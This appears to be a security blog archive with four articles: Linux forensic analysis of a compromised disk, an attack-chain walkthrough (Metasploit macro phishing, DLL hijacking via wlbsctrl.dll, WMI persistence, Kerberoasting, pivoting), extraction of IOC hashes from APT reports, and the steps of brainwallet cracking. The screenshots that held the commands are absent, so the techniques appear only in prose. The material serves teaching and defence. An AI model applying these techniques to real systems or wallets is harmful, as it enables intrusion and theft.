Intro to Linux Forensics

This article is a quick exercise and a small introduction to the world of Linux forensics.  Below, I perform a series of steps in order to analyze a disk that was obtained from a compromised system that was running a Red Hat operating system. I start by recognizing the file system, mounting the different partitions, creating a super timeline and a file system timeline. I also take a quick look at the artifacts and then unmount the different partitions. The process of how to obtain the disk will be skipped but here are some old but good notes on how to obtain a disk image from a VMware ESX host.

When obtaining the different disk files from the ESX host, you will need the VMDK files. Then you move them to your Lab which could be simple as your laptop running a VM with SIFT workstation. To analyze the VMDK files you could use the “libvmdk-utils” package that contain tools to access data store in VMDK files. However, another approach would be to convert the VMDK file format into RAW format. In this way, it will be easier to run the different tools such as the tools from The Sleuth Kit – which will be heavily used – against the image. To perform the conversion, you could use the QEMU disk image utility. The picture below shows this step.

Following that, you could list the partition table from the disk image and obtain information about where each partition starts (sectors) using the “mmls” utility. Then, use the starting sector and query the details associated with the file system using the “fsstat” utility. As you could see in the image, the “mmls” and “fsstat” utilities are able to identify the first partition “/boot” which is of type 0x83 (ext4). However, “fsstat” does not recognize the second partition that starts on sector 1050624.

This is due to the fact that this partition is of type 0x8e (Logical Volume Manager). Nowadays, many Linux distributions use LVM (Logical Volume Manager) scheme as default. The LVM uses an abstraction layer that allows a hard drive or a set of hard drives to be allocated to a physical volume. The physical volumes are combined into logical volume groups which by its turn can be divided into logical volumes which have mount points and have a file system type like ext4.

With the “dd” utility you could easily see that you are in the presence of LVM2 volumes. To make them usable for our different forensic tools we will need to create device maps from the LVM partition table. To perform this operation, we start with “kpartx” which will automate the creation of the partition devices by creating loopback devices and mapping them. Then, we use the different utilities that manage LVM volumes such as “pvs”, “vgscan” abd “vgchange”. The figure below illustrates the necessary steps to perform this operation.

After activating the LVM volume group, we have six devices that map to six mount points that make the file system structure for this disk. Next step, mount the different volumes as read-only as we would mount a normal device for forensic analysis. For this is important to create a folder structure that will match the partition scheme.

After mounting the disk, you normally start your forensics analysis and investigation by creating a timeline. This is a crucial step and very useful because it includes information about files that were modified, accessed, changed and created in a human readable format, known as MAC time evidence (Modified, Accessed, Changed). This activity helps finding the particular time an event took place and in which order.

Before we create our timeline, noteworthy, that on Linux file systems like ext2 and ext3 there is no timestamp about the creation/birth time of a file. There are only 3 timestamps. The creation timestamp was introduced on ext4. The book “The Forensic Discovery 1st Edition”from Dan Farmer and Wietse Venema outlines the different timestamps:

  • Last Modification time. For directories, the last time an entry was added, renamed or removed. For other file types, the last time the file was written to.
  • Last Access (read) time. For directories, the last time it was searched. For other file types, the last time the file was read.
  • Last status Change. Examples of status change are: change of owner, change of access permission, change of hard link count, or an explicit change of any of the MACtimes.
  • Deletion time. Ext2fs and Ext3fs record the time a file was deleted in the dtime stamp.the filesystem layer but not all tools support it.
  • Creation time: Ext4fs records the time the file was created in crtime stamp but not all tools support it.

The different timestamps are stored in the metadata contained in the inodes. Inodes are the equivalent of MFT entry number on a Windows world. One way to read the file metadata on a Linux system is to first get the inode number using, for example, the command “ls -i file” and then you use “istat” against the partition device and specify the inode number. This will show you the different metadata attributes which include the time stamps, the file size, owners group and user id, permissions and the blocks that contains the actual data.

Ok, so, let’s start by creating a super timeline. We will use Plaso to create it. For contextualization  Plaso is a Python-based rewrite of the Perl-based log2timeline initially created by Kristinn Gudjonsson and enhanced by others. The creation of a super timeline is an easy process and it applies to different operating systems. However, the interpretation is hard. The last version of Plaso engine is able to parse the EXT version 4 and also parse different type of artifacts such as syslog messages, audit, utmp and others. To create the Super timeline we will launch log2timeline against the mounted disk folder and use the Linux parsers. This process will take some time and when its finished you will have a timeline with the different artifacts in plaso database format. Then you can convert them to CSV format using “psort.py” utility. The figure below outlines the steps necessary to perform this operation.

Before you start looking at the super timeline which combines different artifacts, you can also create a traditional timeline for the ext file system layer containing data about allocated and deleted files and unallocated inodes. This is done is two steps. First you generate a body file using “fls” tool from TSK. Then you use “mactime” to sort its contents and present the results in human readable format. You can perform this operation against each one of the device maps that were created with “kpartx”. For sake of brevity the image below only shows this step for the “/” partition. You will need to do it for each one of the other mapped devices.

Before we start the analysis, is important to mention that on Linux systems there is a wide range of files and logs that would be relevant for an investigation. The amount of data available to collect and investigate might vary depending on the configured settings and also on the function/role performed by the system. Also, the different flavors of Linux operating systems follow a filesystem structure that arranges the different files and directories in a common standard. This is known as the Filesystem Hierarchy Standart (FHS) and is maintained here. Its beneficial to be familiar with this structure in order to spot anomalies. There would be too much things to cover in terms of things to look but one thing you might want to run is the “chkrootkit” tool against the mounted disk. Chrootkit is a collection of scripts created by Nelson Murilo  and Klaus Steding-Jessen that allow you to check the disk for presence of any known  kernel-mode and user-mode rootkits. The last version is 0.52 and contains an extensive list of known bad files.

Now, with the supertimeline and timeline produced we can start the analysis. In this case, we go directly to timeline analysis and we have a hint that something might have happened in the first days of April.

During the analysis, it helps to be meticulous, patience and it facilitates if you have comprehensive file systems and operating system artifacts knowledge. One thing that helps the analysis of a (super)timeline is to have some kind of lead about when the event did happen. In this case, we got a hint that something might have happened in the beginning of April. With this information, we start to reduce the time frame of the (super)timeline and narrowing it down. Essentially, we will be looking for artifacts of interest that have a temporal proximity with the date.  The goal is to be able to recreate what happen based on the different artifacts.

After back and forth with the timelines, we found some suspicious activity. The figure below illustrates the timeline output that was produced using “fls” and “mactime”. Someone deleted a folder named “/tmp/k” and renamed common binaries such as “ping” and “ls” and files with the same name were placed in the “/usr/bin” folder.

This needs to be looked further. Looking at the timeline we can see that the output of “fls” shows that the entry has been deleted. Because the inode wasn’t reallocated we can try to see if a backup of the file still resides in the journaling. The journaling concept was introduced on ext3 file system. On ext4, by default, journaling is enabled and uses the mode “data=ordered”. You can see the different modes here. In this case, we could also check the options used to mount the file system. To do this just look at “/etc/fstab”. In this case we could see that the defaults were used. This means we might have a chance of recovering data from deleted files in case the gap between the time when the directory was deleted and the image was obtained is short. File system journaling is a complex topic but well explained in books like “File system forensics” from Brian Carrier. This SANS GCFA paper from Gregorio Narváez also covers it well.  One way you could  attempt to recover deleted data is using the tool “extundelete”.  The image below shows this step.

The recovered files would be very useful to understand more about what happened and further help the investigation. We can compute the files MD5’s, verify its contents and if they are known to the NSLR database or Virustotal. If it’s a binary we can do strings against the binary and deduce functionality with tools like “objdump” and “readelf”. Moving on, we also obtain and look at the different files that were created on “/usr/sbin” as seen in the timeline. Checking its MD5, we found that they are legitimate operating system files distributed with Red Hat. However, the files in “/bin” folder such as “ping” and “ls” are not, and they match the MD5 of the files recovered from “/tmp/k”.  Because some of the files are ELF binaries, we copy them to an isolated system in order to perform quick analysis. The topic of Linux ELF binary analysis would be for other time but we can easily launch the binary using “ltrace -i” and “strace -i” which will intercept and record the different function/system calls. Looking at the output we can easily spot that something is wrong. This binary doesn’t look the normal “ping” command, It calls the fopen() function to read the file “/usr/include/a.h” and writes to a file in /tmp folder where the name is generated with tmpnam(). Finally, it generates a segmentation fault. The figure below shows this behavior.

Provided with this information, we go back and see that this file “/usr/include/a.h” was modified moments before the file “ping” was moved/deleted. So, we can check when this “a.h” file was created – new timestamp of ext4 file system – using the “stat” command. By default, the “stat” doesn’t show the crtime timestamp but you can use it in conjunction with “debugfs” to get it. We also checked that the contents of this strange file are gibberish.

So, now we know that someone created this “a.h” file on April 8, 2017 at 16:34 and we were able to recover several other files that were deleted. In addition we found that some system binaries seem to be misplaced and at least the “ping” command expects to read from something from this “a.h” file. With this information we go back and look at the super timeline in order to find other events that might have happened around this time.  As I did mention, super timeline is able to parse different artifacts from Linux operating system. In this case, after some cleanup we could see that we have artifacts from audit.log and WTMP at the time of interest. The Linux audit.log tracks security-relevant information on Red Hat systems. Based on pre-configured rules, Audit daemon generates log entries to record as much information about the events that are happening on your system as possible. The WTMP records information about the logins and logouts to the system.

The logs shows that someone logged into the system from the IP 213.30.114.42 (fake IP) using root credentials moments before the file “a.h” was created and the “ping” and “ls” binaries misplaced.

And now we have a network indicator. Next step we would be to start looking at our proxy and firewall logs for traces about that IP address. In parallel, we could continue our timeline analysis to find additional artifacts of interest and also perform in-depth binary analysis of the files found, create IOC’s and, for example, Yara signatures which will help find more compromised systems in the environment.

That’s it for today. After you finish the analysis and forensic work you can umount the partitions, deactivate the volume group and delete the device mappers. The below picture shows this steps.

Linux forensics is a different and fascinating world compared with Microsoft Windows forensics. The interesting part (investigation) is to get familiar with Linux system artifacts. Install a pristine Linux system, obtain the disk and look at the different artifacts. Then compromise the machine using some tool/exploit and obtain the disk and analyze it again. This allows you to get practice. Practice these kind of skills, share your experiences, get feedback, repeat the practice, and improve until you are satisfied with your performance. If you want to look further into this topic, you can read “The Law Enforcement and Forensic Examiner’s Introduction to Linux” written by Barry J. Grundy. This is not being updated anymore but is a good overview. In addition, Hal Pomeranz has several presentations here and a series of articles written in the SANS blog, specially the 5 articles written about EXT4.

 

References:
Carrier, Brian (2005) File System Forensic Analysis
Nikkel, Bruce (2016) Practical Forensic Imaging

Tagged , , , ,

Offensive Tools and Techniques

In this article I go over a series of examples that illustrate different tools and techniques that are often used by both sides of the force! To exemplify it, I will follow the different attack stages and will use the intrusion kill chain as methodology. This methodology consist of seven stages. Reconnaissance, weaponization, delivery, exploitation, installation, C2 and action on objectives.

offensive-logoLet’s start with Recon! The goal here is to seek information about the target, normally a person. Targeting high profile individuals might be difficult because these individuals tend to have a personalized security group that looks after them. However, using different intelligence-gathering techniques such as searching information available in a variety of public information sources you can target other personnel. Due to the human nature, people succumb to social engineering techniques and several times they provide more information than is necessary. A starting point is to harvest metadata about the organization and personnel. Normally, companies do not know what metadata they are giving way. Metadata is a golden pot of information and information such as usernames, software versions, printers, email addresses and others can be retrieved using a tool such as FOCA Metadata Analysis Tool. You can see the presentation that was given by Chema Alonso and Jose Palazon Palatko in 2010 at Defcon 18 about FOCA 2.5.  At the end the attacker will use whatever works to gather as much information as possible about employee names, position in the hierarchy, friends and relatives, hobbies, etc.

Next step, weaponization and delivery! After getting as much information as possible and performing enough recon the attacker will choose the best method to perform the attack with his available resources. Nowadays, spear phishing techniques with attached documents are very dominant and probably a good choice as attack vector. The sophistication of how a document is weaponized and delivered might correlate with the amount of resources available to the attacker. In the example below I show how you could use Metasploit to easily create a word document with a malicious macro that when executed will connect back to the attacker system and establish a command and control channel. The payload uses HTTPS as communication channel but it uses a self-signed certificate and points to an IP address and not a domain. In organization of different sizes, many times the web filtering controls are tight and use different blocking techniques that might detect and stop this type of connection. However, the attacker can register a new domain or buy an expired domain ahead of time, create a simple and realistic web page and categorize the domain in a category such as Finance or Healthcare – these are normally allowed in web filtering products and probably the SSL wouldn’t be terminated and inspected. In addition, the attacker can buy a cheap SSL certificate and make this scenario much more realistic.  In addition, Metasploit just introduced an updated traffic obfuscation technique that will make harder for security products to detect it.

Before I continue with the different tools and techniques, is worth to mention that in this article I give several examples using the Metasploit Framework. For those of you who don’t know, Metasploit framework was originally created by the legendary H.D. Moore back in 2003. Originally coded in Perl and then ported to Ruby. In 2004, Metasploit Framework 2.0 was released and had less than 20 exploits and a similar number of payloads. Today, the free version of Metasploit framework has more than 1600 exploits and more than 400 payloads. In addition many other auxiliary modules, encoders and post exploitation modules are available. The modular framework of Metasploit makes it a fantastic tool to design, build and launch exploits.

So, the picture below illustrates how to use Metasploit to create a weaponized Word document. An alternative to this technique is to use PowerShell Empire. See this article from Matt Nelson.

offensive-macro

Then, the word document can be customized and tailored to the target. To summarize, the attacker crafts a phishing email, either with a weaponized document or malicious link. This coupled with different social engineering techniques that appeal to human nature and exploit human vulnerabilities have good probability to make the attack a success. There is other factor that might impact the success of the campaign, which is the ability of the malicious email/link to circumvent the multitude of expensive filters that are layered throughout the network boundary and reach to the endpoint. If the email reaches the endpoint, you might have a well-intentioned employee making mistakes.  If these conditions are met, the attacker will establish a foothold inside the corporate network.

The picture below depicts the steps performed by the attacker to launch the Metasploit handler that will accept the beacon from the malicious document. Then, it shows the communication received and the established session.

offensive-macrohandler

Next step exploitation! With a foothold in the environment and an established communication channel the attacker will act quickly, stealthy and will probably try to find avenues to exploit other systems and achieve higher privileges.  Ruben Boonen who maintains fuzzysecurity.com and goes by the handler @FuzzySec has wrote a very comprehensive article where he describes the different techniques that could be used to escalate privileges on a Windows environment. Another great resource is the paper “Windows Services – All roads lead to SYSTEM” from Kostas Lintovois that exemplifies several ways in which misconfigured services could be compromised.  These techniques are very useful for attackers because in many organizations normal users don’t have admin rights. Admin rights are likely a goal that all attackers aim in an enterprise environment because it facilitates their job.

Many of the techniques written by Ruben and others have been materialized in the post-exploitation framework known as PowerSploit in a module called PowerUp.ps1 which has been originally written by Will Schroeder – a brilliant security researcher that in recent years released powerful tools -. PowerSploit contains a great library of modules and scripts that help in all phases of an attack life-cycle.  The PowerUp module facilitates the discovery of conditions that would allow an attacker to execute a technique that will lead him to get a privileged account. All this done using PowerShell and can be executed from within Meterpreter using the PowerShell extension that was written by OJ Reeves and incorporated into Metasploit  This means, that attacker can run PowerUp from within Metasploit. You can read more about PowerUp on Will Schroeder blog and also get PowerUp cheat sheet from here.

The picture below illustrates this scenario, where the attacker after getting a foothold in the environment – via phishing email – verifies that the account he is operating with doesn’t have enough privileges to run additional modules such as the powerful Mimikatz. Mimikatz is a post-exploitation tool written in C and developed by Benjamin Delphy. You can read more about many of its features on Sean Metcalf Unofficial Guide to Mimikatz and Command reference here and here. However, Meterpreter contains a PowerShell module that would allow the attacker to execute PowerShell commands. In this case the attacker can load the PowerShell module, execute the necessary commands to download the PowerUp from GitHub, a site owned by the attacker or other place and then perform the Invoke-AllChecks. At the time of this writing, the PowerUp module contains 14 checks.

offensive-powerup

In this case, as you could see in the image, the conditions necessary to perform DLL hijacking are found by PowerUp module. Essentially, the system contains a directory that any authenticated user can write to and this directory is part of the %PATH% environment variable. With this the attacker can leverage the DLL search order and obtain system privileges.  In this case PowerUp suggests to use “wlbsctrl.dll”. For this to work the Windows service “IKE and AuthIP IPsec Keying Modules” needs to be running but in enterprises where workstations have VPN clients installed this is quite common. This vulnerability was discovered in 2012 by the High-Tech Bridge Security Research Lab. It leverages the Windows service “IKE and AuthIP IPsec Keying Modules”, which during startup tries to load the “wlbsctrl.dll” DLL that doesn’t exist on default Windows installations. A great explanation about how this technique works and why the vulnerability exists was written by Parvez Anwar here.  Another resource about this topic is “DLL Hijacking Like a Boss!” presentation Jake Williams and an old article from the Corelan team here.

So, now that there is an avenue to explore, the next step is for the attacker to create a DLL that matches the architecture of the target system and has the name “wlbsctrl.dll”. This can be easily done with msfvenom. This utility is very popular to create one liners commands that will generate and encode a desired payload. Msfvenom was added to Metasploit in 2011 and combines the older Msfpayload and Msfencode commands in one utility. This is showing in the figure below.

offensive-dll

Another way to leverage this technique is to use Write-HijackDll function available in the PowerUp.ps1 module. This function will create and drop the “wlbsctrl.dll” DLL into the writable path and when the service starts the DLL will load and will add a user to local administrators with a predefined password.

An important remark in regards to the usage of PowerShell is that on some environments the security might be tight and PowerShell execution might be blocked. However, in this cases the attacker could use other techniques and use other tools such as PowerOPS: PowerShell for Offensive Operations tool written by Portuculis Lab and inspired in the PowerShell Runspace Post Exploitation Toolkit written by Cn33liz.

After that, the attacker uploads the DLL to the desired folder, the attacker can force a reboot or wait for the system to be rebooted. When the system starts, the IKEEXT service will be started and the malicious DLL will be loaded, spawning a command and control channel back to the system owned by the attacker and with SYSTEM privileges. The picture below illustrates the upload of the malicious DLL to the folder that has weak permissions and is part of the %PATH% variable. Then it follows the command and control channel that is established due to the IKEEXT service being started. Due to the high privileges the attacker can then move on and start using the powerful Mimikatz module. To start he can obtain clear text credentials by using Kerberos command.

offensive-dllhijack

Now, the attacker is operating under a high privileged account! With that, the attacker can move on and find a way to establish a persistence mechanism and in parallel move laterally within the environment.

Next step, installation and C2! There are a multitude of clever techniques and tools used by attackers to accomplish a persistence mechanism but in this case I would give an example of using WMI combined with PowerShell using a payload crafted by Metasploit.

WMI has gained popularity among attacker in recent years. A good resource is the presentation that Matt Graeber gave on BlackHat 15 : Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor. In addition, William Ballenthin, Matt Graeber and Claudiu Teodorescu have written a great paper about the usage of WMI for both offense and defense. Furthermore, you can read the paper WMI for Detection and Response from NCCIC/ICS-CERT.

So, to achieve persistence the attacker could use Windows Management Instrumentation (WMI). The WMI will be used as a vehicle to trigger a payload to run at a particular event. This event could be a specific schedule, an event that occurred at the OS level, such as login or one of the many events supported by WMI. The payload would leverage PowerShell to perform a technique known as Reflective DLL injection which will call back to the attacker system and inject the Metasploit Meterpreter – to read more about Reflective DLL injection read this article from Dan Staples and its references -. The communication occurs over HTTPS back to the domain owned by the attacker. In sum, the attacker will only use windows built-in functionality combined with Metasploit. This arrangement of different tools and techniques lead to more powerful attacks that are harder to detect. In addition this technique leverages in memory payload that doesn’t touch disk due to the fact that uses a PE loader in memory to load the DLL and not the traditional LoadLibraryA() method. The persistence mechanism is inside the WMI repository which is likely to be outside of the radar of many defenders.

Let’s see how the attacker can build this. To craft the payload the attacker could use msfvenom utility that is part of Metasploit framework. The following picture illustrates the use of msfvenom to create the Reflective DLL injection payload using PowerShell format.

offensive-pshcmd

Next step would be to weaponize this payload into a Managed Object Format (MOF) script.

offensive-wmimof

Next the attacker will use the Managed Object Format (MOF) compiler, Mofcomp.exe on the target machine. This utility will parse a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. A good article about MOF is “Playing with MOF files on Windows, for fun & profit” from Jérémy Brun-Nouvion. After that, a series of wmic.exe commands can be executed to view the contents of the different classes.

offensive-wmicommands

These commands are executed within the Meterpreter session that was established with the DLL hijacking technique. Then the attacker can cover his tracks and delete the malicious MOF script and move on. When the WMI event is triggered, the payload is invoked and a meterpreter session is established back to the system owned by the attacker. With this, the attacker has a persistence mechanism and is operating in the target environment with a privileged account.

Next, action on objectives! Lateral movement has been traditionally done using a variety of commands and tools such as net.exe, psexec.exe and wmic.exe. Nowadays, you can add PowerShell to the mix.. More specifically using the PowerView tool which was developed by William Schroeder and is part of PowerSploit tools and scripts. PowerView is an advanced active directory enumeration tool written in PowerShell that allows an attacker to gather extensive amount of information about a Windows enterprise environment. You can read more about the reason behind Powerview hereThis great write-up demonstrates several use cases for PowerView. Once again, we can load PowerView from within our Meterpreter sessions. In this case, the session has SYSTEM privileges and was obtained leveraging the WMI persistence but PowerView can run with a normal account.  The picture below exemplifies this step.

offensive-powerview

The list of functions available within PowerView is here and the cheat sheet here. The attacker starts enumerating different aspects of the Active Directory and the different systems just by leveraging PowerShell commands. To perform this he can leverage different techniques and modules within PowerView.  For a great summary you can see – once again – William Schroeder presentation given at Troopers 16 entitled “I have the power view”.

So, to start, the attacker can leverage the Kerberoasting technique. This technique pioneered by Tim Medin – I recommend you watch his presentation “Attacking Kerberos – Kicking the Guard God of Hades” – is brilliant and exploits the way Kerberos functions inside a Microsoft environment. This technique has been reorganized and adopted by PowerView and to run it is as simple as to list all user accounts in the active directory environment that have a SPN, request a Kerberos ticket and extract the crypto material. Then crack it offline to obtain clear text password. You can read more about it in this two articles written by William here and here. The below picture illustrates the Kerberoasting technique.

offensive-kerberoast

After obtaining the hash you could use John the Ripper to crack the password using as hash format the krb5tgs.

Another attack vector is to find accounts in the Active Directory that don’t require Kerberos preauthentication i.e., the PreAuthNotRequire attribute is enabled. This technique was pioneered by Geoff Janjua from Exumbra Operations and you can read the work he did in the article “Kerberos Party Tricks: Weaponizing Kerberos Protocol Flaws“. Essentially the technique consists on listing all accounts that have this attribute and request a Kerberos ticket for those accounts. This ticket contains crypto material that can be extracted and cracked offline. Once again this technique was adopted by PowerView and you can read more about it here.

Finally, if these techniques don’t work, then the attacker likely will move from system to system until he finds a system where he can obtain administrative privileges and move on until he finds a domain admin. This can be daunting task in large environments but once again William Schroeder coded the necessary steps into a series of PowerView modules that are coined with the Hunter word such as Invoke-UserHunter, Invoke-StealthUserHunter and many others that will facilitate the search for high value targets. You can view his presentation “I hunt sysadmins” to understand more what these modules do behind the scenes.  Justin Warner, one of the founders of PowerShell Empire, wrote a great article explaining how these modules works and went further by explaining a technique he named as derivative local admin. This technique was then automated by Andy Robbins which started in a proof-of-concept tool called PowerPath which leverages algorithms that are used to find the shortest path between two points. Andy then worked with Rohan Vazarkar and Will Schroeder  and their work culminated in the release of a tool called BloodHound. The tool was released as open source tool at DEF CON 24. Bottom line, using the different techniques and tools implemented by these brilliant folks the threat actor is likely to succeed obtaining a high privileged account.

Then, is matter of pivoting inside the enterprise environment using the obtained privileged accounts. For that the attacker can leverage the netsh.exe port forwarding feature or the Meterpreter port proxy command to pivot between internal systems. This technique is commonly used by attackers that want to use an internal system as pivot, allowing direct access to machines otherwise inaccessible from the attacking system. The command in the picture below illustrates this, where after configuring the port forwarding on the compromised system, the attacker can use wmic.exe to launch PowerShell on a remote system that will connect back to the attacker system and establish a meterpreter session.

offensive-wmimove

From this moment, its a cycle. Enumerate weakness, exploit them, compromise the system, move further, repeat. This cycle goes on and on until the attacker meets his objectives. A great resource about the techniques that were shown and many others are listed in this article written by Raphael Mudge, the author of Cobalt Strike.

That’s it. With this we covered different tools and techniques that are used in the different attack stages and used nowadays by security professionals but as well by cyber criminals and APT groups. After this, I would ask, how would you detect, prevent and respond to each one of the steps outlined in this attack scenario?

Feel free to share your ideas in the comments below. Thanks for reading!

Tagged , , , , , , , , ,

Extract and use Indicators of Compromise from Security Reports

apt-reports-1Every now and then there is a new security report released and with it comes a a wealth  of information about different threat actors offering insight about the attacker’s tactics, techniques and procedures. For example, in this article I wrote back in 2014, you have a short summary about some of the reports that were released publicly throughout the year. These reports allow the security companies to advertise their capabilities but on the other hand they are a great resource for network defenders. Some reports are more structured than others and they might contain different technical data. Nonetheless, almost all of them have IOC’s (Indicators of compromise).

For those who never heard about indicators of compromise let me give a brief summary. IOC’s are pieces of information that can be used to search and identify compromised systems. These pieces of information have been around since ages but the security industry is now using them in a more structural and consistent fashion. All types of enterprises are moving from the traditional way of handling security incidents – Wait for an alert to come in and then respond to it – to a more proactive approach which consists in taking the necessary steps to hunt for evil in order to defend their networks. In this new strategy, the IOCs are a key technical component. When someone compromises a system, they leave evidence behind.  That evidence, artifact or remnant piece of information left by an attacker can be used to identify the intrusion, threat group or the malicious actor. Examples of IOCs are IP addresses, domain names, URLs, email addresses, file hashes, HTTP user agents, registry keys, a service configuration change, a file is deleted, etc. With this information one could sweep the network/endpoints and look for indicators that the system might have been compromised. For more background about it you can read Lenny Zeltzer summary. Will Gragido from RSA explained it well in is 3 parts blog herehere and here. Mandiant also has this and this great articles about it.

So, if almost all the reports published contain IOC’s, is there a central place that contains all reports that were released by the different security organizations? Kiran Bandla created a repository on GitHub named APTnotes where he does exactly that. He maintains a list of all security reports released by the different vendors – “APTnotes is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets.” Kiran, among other methods relies on the community who share with him when a report X or Y was released and he adds it to the APTnotes repository. The list of reports is available in CSV and JSON format.

So, what can you do with all this reports? How can we as network defenders use this information?

Three example use cases.  The first use case is more likely and common, where the other two might be more common in larger organizations with higher budget and bigger security appetite.

  • An organization that has a Security Operations Center in place could use the IOC’s to augment their existing monitoring and detection capabilities.
  • An organization that has in-house CSIRT capabilities could leverage the IOC’s in a proactive manner in order to have a higher probability of discovering something bad and, as such, reduce the business impact that a security incident might have in the organization.
  • An organization that has a Cyber Threat Intelligence capability in-house, could collect, process, exploit and analyze these reports. Then disseminate actionable information to the threat intelligence consumers throughout the organization.

In a simple manner, the process for the first scenario would look something like the following diagram:

ioc-loop

How would this work in practical terms? Normally, you could split the IOC’s in host based or network based. For example, a DNS name or IP addresses will be more effective to search across your network infrastructure. However, a Registry Key or a MD5 will be more likely to be searched across the endpoint.

For this article, I will focus on MD5’s. Some reports offer file hashes using SHA-1 or SHA-256 but not many organizations have the capability to search for this. MD5 is more common. Noteworthy that the value of MD5 hashes about a malicious file might be considered low.  A great article about the value of IOC’s and TTP’s was written back in 2014 from David Bianco title The Pyramid of Pain. Following that there is an article from Harlan Carvey with additional thoughts about it. Another point to take into consideration about the MD5’s from the reports is that some might be from legitimate files due to the usage of DLL hijacking or they are windows built-in commands used by threat actors. In addition is likely that malware used by the different threat actors is only used once and you might not see a MD5 hash a second time. Nonetheless, the MD5’s is a starting point.

So, how can we collect the reports, extract the IOC’s and convert them and use them?

First you can use a python script to download all the reports in a central place separated per year. Then you can use the tool IOC parser written by Armin Buescher. This tool will be able to parse PDF reports and extract IOC’s into CSV format. From here you can extract the relevant IOC’s. For this example, I want to extract the MD5’s and then use IOC writer to create IOC’s in OpenIOC 1.0/1.1  format which could be used with a tool such as Redline.  IOC writer is a python library written by William Gibb that allows you to manipulate IOC’s in OpenIOC 1.1 and 1.0 format and was released on BlackHat 2013.

The steps necessary to perform this are illustrated below – for sure there are  other better ways to perform this but this was a quick way to do the job -.

extract-create-ioc

With this we created a series of files with  .ioc extension that can be further edited with the ioc_writer Python library. However, not many tools support OpenIOC, so you might just use the MD5’s and feed that into whatever tool or format you are using. You can download below the excel with all the MD5’s separated per year.  If you use them, please bare in mind you might have false positives and you will need to go back to the csv files to understand from which report did the MD5 came from. For example I  already removed half dozen of MD5’s that are legitimate files but seen in the reports, and also the MD5 for an empty file “d41d8cd98f00b204e9800998ecf8427e”

That’t it, with this you can create a custom IOC set that contain MD5’s of different tools, malware families and files that was compiled by extracting the MD5’s from the public reports about targeted attacks. From here you can start building more complex IOC’s with different artifacts based on a specific report or threat actor. Maybe you get lucky and you find evil on your network!

The year 2010 contains 81 unique MD5’s.
The year 2011 contains 96 unique MD5’s.
The year 2012 contains 718 unique MD5’s.
The year 2013 contains 2149 unique MD5’s
The year 2014 contains 1306 unique MD5’s
The year 2015 contains 1553 unique MD5’s
The year 2016 contains 1173 unique MD5’s

Excel : md5-aptnotes-2010-2016

Tagged

Blockchain & Brainwallet cracking

img_1293The blockchain is the underlying technology that enables the bitcoin cryptocurrency to exist. A foundational component of this technology is its complex cryptosystem. The blockchain cryptosystem relies on public key algorithms based on Elliptic Curve and message digest functions like SHA-256 and RIPEMD-160. When you create a bitcoin wallet, under the hood you are creating an Elliptic Curve key pair based on Secp256k1 curves. The key pair has a private key and a public key. The private key is the one you keep secret and allows you to sign transactions. For example, when you send bitcoins to someone, you are signing this transaction with your private key and then you announce it to the network. The miners will pick up your transaction and verify that the transaction signature is valid and broadcast to the network until enough miners have validated the transaction and thus achieving consensus. The checks and balances of the Blockchain ledger are updated and when consensus is achieved, your transaction is written in “digital stone”.

On the other hand, the public key is the one used to create your bitcoin wallet address. The public key allows you to receive bitcoins. However, your bitcoin wallet address is not your raw Elliptic Curve public key There are additional steps performed in order to create an address. First, a digital representation of your public key is computed using SHA-256 followed by RIPEMD-160. Second, a byte with network id is prepended to this string. Third, a checksum of this string is computed by performing SHA-256 twice. From these results the first 4 bytes are appended to the string produced in second step. This string is encoded in Base58 and this is your bitcoin wallet address. The picture below illustrates this steps in a non-automated way.

generatebitcoinaddr

There are many forms to store your bitcoins as well as to create wallets. One of the early methods to create bitcoin wallets was known as brain wallets. Unfortunately, this user-friendly method allowed you to enter a password or passphrase which was then hashed using an algorithm such as SHA-256 and used as seed to generate your private key. Due to its popularity and easy usage, many Brain wallets were used in the last few years with weak passwords or passphrases, transforming the Blockchain wallet address hashes in password or passphrases representation of your private key. This weak way of generating your private key allowed attackers to steal your bitcoins just by doing password cracking against the hashes stored in the Blockchain.

Although, this attack has been known for years,  it only got widely known recently due to the work made by Ryan Castellucci. Ryan’s released on 7th August 2015 at DEFCON 23 the results of his work cracking brain wallets in conjunction with a tool called BrainFlayer : A proof-of-concept cracker for cryptocurrency brain wallets and other low entropy key algorithms. You can view Ryan’s talk here.  Two months after Ryans’ initial release of BrainFlayer, he released a faster version. This was the result of the work done by Nicolas Courtois, Guangyang Song from
International Association for Cryptologic Research (IACR), University College London, and Ryan’s to optimize the speed of computing secp256k1 bitcoin elliptic curve. This has been detailed in the paper Speed Optimizations in Bitcoin Key Recovery Attacks.  Furthermore, this year at the Financial Cryptography and Data Security conference, Marie Vasek presented another article The Bitcoin Brain Dain: A Short Paper on the Use and Abuse of Bitcoin Brain Wallets. This paper published the results of evaluating 300 billion passwords against Blockchain hashes and their findings about 884 brain wallets that had funds at a given time, suggesting they might have been drained by active attackers.

So, how do you perform such attack?

The attempt to recover a password just by knowing its encrypted representation can be made mainly using three techniques. Dictionary attacks, which is the fastest method and consists of comparing the dictionary word with the password hash. Another method is the brute force attack, which is the most powerful one but the time it takes to recover the password might render the attack unfeasible. This is of course dependable on the complexity of the password and the chosen algorithm. Finally, there is the hybrid technique which consists of combining words in a dictionary with word mangling rules.

With that being said let’s go over the steps needed to perform this attack against the Blockchain hash160 hashes using a dictionary. This is done in 6 steps:

  • Bootstrap the Blockchain.
  • Parse the Blockchain by running Blockparser and get allBalances.
  • Extract hash160 strings.
  • Create a Bloomfilter.
  • Run BrainFlayer with your favorite dictionary.
  • Use Addressgen to generate key pair.

First step is to bootstrap the blockchain. To perform this, we need to download, install and run the bitcoin software on a system connected to the Internet. The system then becomes a node and part of the peer-to-peer blockchain network. The first task performed by the node is to download the entire database of records i.e., the public transaction ledger and verify it using the transaction engine. In other words, the node downloads the entire blockchain and verifies the validity of all blocks by performing a series of checks   This needs a lot of bandwidth and computing power. As I write this the Blockchain size is 90.633 Gb and contains 438556 blocks. The data contains every transaction that has been made in the blockchain since the genesis block was created on the 3rd of January 2009 at 18:15:05 GMT. To download the entire Blockchain, took me more than 72 hours . The image below illustrates the steps needed to perform the download, installation and running the bitcoin software.

installbitcoin

Then, the picture below illustrates the steps needed to perform the configuration and running the bitcoin software. You can view the progress by executing the getblockchaininfo command and check the number of blocks that have been already downloaded.

runbitcoin

